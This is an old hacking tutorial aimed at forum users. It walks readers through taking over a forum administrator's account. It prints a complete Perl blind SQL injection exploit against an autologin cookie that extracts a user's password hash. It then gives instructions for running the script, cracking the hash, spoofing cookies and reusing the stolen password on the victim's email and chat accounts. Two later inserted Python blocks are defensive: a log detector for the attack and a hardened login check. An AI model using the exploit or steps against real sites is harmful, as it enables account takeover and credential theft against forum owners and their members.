July 3, 2010

How To Hack A Forum [TUTORIAL]

This tutorial will allow you to get an admin's password and hack the forum.

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as "hackingsite".
So you've got your target. You know the forum you want to hack, but how? Let's find the user we
want to hack. Typically, you'd want to hack the admin. The administrator is usually the first
member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you
wish to hack. For this tutorial, let's say his/her ID is "2".


Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".
Now we need a nice exploit. For 1.3.1 forums, I prefer to use one that is in common circulation
around these forums. For those who don't have it, here:

CODE
#!/usr/bin/perl -w

##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################

 use LWP::UserAgent;
$ua = new LWP::UserAgent;

$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';
for( $i=1; $i < 33; $i++ )
{for( $j=0; $j < 16; $j++ )
{my $current = $charset[$j];
my $sql = ( $iver < 2 ) ?
"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';

$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{$outputs .= $current;
print "$current\n";
last;
}}if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
# ReMuSoMeGa & nova
What the fuck. Pretty confused, aren't you? What the fuck are you supposed to do with this shit?!
I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take
my route of preference, and install Perl on your PC. You're going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.
Open the file up, and let it install. Leave everything on default. In other words, just keep hitting "OK".

So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In
there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should
see another folder named "bin". Open up "bin". Now that you're in, drag and drop "ipb.pl" from your
desktop, into "bin".


Alrighty. Now everything is fine, and you're ready to Pwn some FAGS.
What you're going to want to do now is open up your command prompt. If you don't know how,
please quit this site, and die.... Start - Run - CMD 
Alright, so now you're in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:

cd C:\Perl\bin
Good job. You're very, very close to being finished. Now that you are in the Perl/bin directory, we
need to access the ipb.pl file. How do we do this? Type the following command into your
command prompt:

perl ipb.p
At this point, it should be fairly obvious what to do.. But since I <3 n00bs so much, I'm going to elaborate.

Your exploit is now executed. All you need to do now, is know how to use it. Usage is simple.
Remember who and what site we were hacking? In case you forgot, we were hacking User ID 2,
who is the admin of http://hackingsite.com.
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash.
Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a
few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
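
Seen from the forum operator's side, the run described above is a burst of autologin requests whose pass_hash cookie is not a hash at all. The following is an added example, not part of the original post: a log check that flags such requests. The record layout (client, path, Cookie header), the function names and the sample records are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

HEX32 = re.compile(r"[0-9a-f]{32}")          # shape of a stored MD5 digest
DIGITS = re.compile(r"[0-9]+")
# Matches member_id / pass_hash cookies with or without a cookie prefix.
COOKIE = re.compile(r"(?:^|;\s*)(\w*?)(member_id|pass_hash)=([^;]*)")

def decode_fully(value, rounds=3):
    """Undo nested URL encoding (%2527 -> %27 -> ') before inspecting."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(path, cookie_header):
    """Return the reasons an autologin request looks malformed (empty if clean)."""
    if "CODE=autologin" not in path:
        return []
    reasons = []
    for _prefix, name, raw in COOKIE.findall(cookie_header):
        value = decode_fully(raw)
        if name == "pass_hash" and not HEX32.fullmatch(value):
            reasons.append("pass_hash is not a 32-char hex digest")
        if name == "member_id" and not DIGITS.fullmatch(value):
            reasons.append("member_id is not numeric")
    return reasons

def flag_clients(records, threshold=3):
    """records: (client, path, cookie_header). Flag clients with repeated hits."""
    hits = Counter(ip for ip, path, cookie in records if inspect_request(path, cookie))
    return {ip: n for ip, n in hits.items() if n >= threshold}

# Constructed sample records (not real traffic), using the cookie shape from the script above.
AUTOLOGIN = "/forum/index.php?act=Login&CODE=autologin"
BAD = "member_id=31337420; pass_hash=99%2527+OR+(id%3d2+AND+MID(password,1,1)%3d%2527{}%2527)/*"
SAMPLE = [("198.51.100.7", AUTOLOGIN, BAD.format(c)) for c in "012"] + [
    ("203.0.113.5", AUTOLOGIN, "member_id=14; pass_hash=" + "0123456789abcdef" * 2),
]

if __name__ == "__main__":
    print(flag_clients(SAMPLE))
```

The same two format checks belong in the application itself, before the cookie values reach any SQL statement.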
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f

But what can we do with this hash? To you, it just looks like a scramble of numbers and letters.
What this is, is an MD5 hash. This is the person's password, hashed with the MD5 algorithm.
I urge you to do a quick read-up on MD5 hashes before continuing reading.
Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that
MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it
back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to
CRACK an MD5 hash.
There are many places online where you can enter hashes to be cracked. Personally, I use "Cain
& Abel", which is a great MD5 cracker available at 'http://odix.it'. 
You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able
to crack. Once you crack the hash, you will be given a plain-text password.
CONGRATS! You now have the victim's password! You can now login to his/her account on
whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or
MSN/AIM account. Sure bro, fuck them up
But what if the hash is not crackable? You are merely left with a password hash. What can you do
with this?
Well, you can spoof your cookie!

If you would like to learn more on spoofing cookies, use the friendly searching site they call
"GOOGLE"
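
Both the crackable MD5 value and the cookie that works without cracking come from the same design: the stored password hash is fast, unsalted, and doubles as the login cookie. The following is an added example, not code from the original post or from the forum software, of an autologin check without those properties. The table layout, column names and function names are assumptions, and sqlite3 stands in for the forum's database.

```python
import hashlib, hmac, os, re, secrets, sqlite3

ID_RE = re.compile(r"[0-9]{1,10}")
TOKEN_RE = re.compile(r"[0-9a-f]{64}")

def hash_password(password, salt, rounds=600_000):
    """Per-user salt plus a slow KDF, instead of a bare MD5 of the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)

def create_member(db, member_id, password):
    salt = os.urandom(16)
    db.execute("INSERT INTO members VALUES (?, ?, ?, NULL)",
               (member_id, salt, hash_password(password, salt)))

def issue_autologin_token(db, member_id):
    """Random cookie value; only its SHA-256 is stored, never the password hash."""
    token = secrets.token_hex(32)
    db.execute("UPDATE members SET token_sha256 = ? WHERE id = ?",
               (hashlib.sha256(token.encode()).hexdigest(), member_id))
    return token

def check_autologin(db, member_id_cookie, token_cookie):
    """Return the member id for a valid cookie pair, else None."""
    if not ID_RE.fullmatch(member_id_cookie) or not TOKEN_RE.fullmatch(token_cookie):
        return None                      # malformed input never reaches the query
    row = db.execute("SELECT token_sha256 FROM members WHERE id = ?",
                     (int(member_id_cookie),)).fetchone()   # bound parameter
    if row is None or row[0] is None:
        return None
    presented = hashlib.sha256(token_cookie.encode()).hexdigest()
    ok = hmac.compare_digest(presented, row[0])             # constant-time compare
    return int(member_id_cookie) if ok else None

def demo():
    """Build an in-memory database with one constructed member (id 2)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members "
               "(id INTEGER PRIMARY KEY, salt BLOB, pw_hash BLOB, token_sha256 TEXT)")
    create_member(db, 2, "constructed-sample-password")
    return db, issue_autologin_token(db, 2)

if __name__ == "__main__":
    db, token = demo()
    print(check_autologin(db, "2", token))
```

With this layout, a value read out of the members table is neither a reusable cookie nor a fast hash to run through a cracker.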
To crack the hashes go to milw0rm.com
ActivePerl Download(Thanks Hash):
DOWNLOAD here: http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86-148120.msi

[Credit for the first person who can post it.]
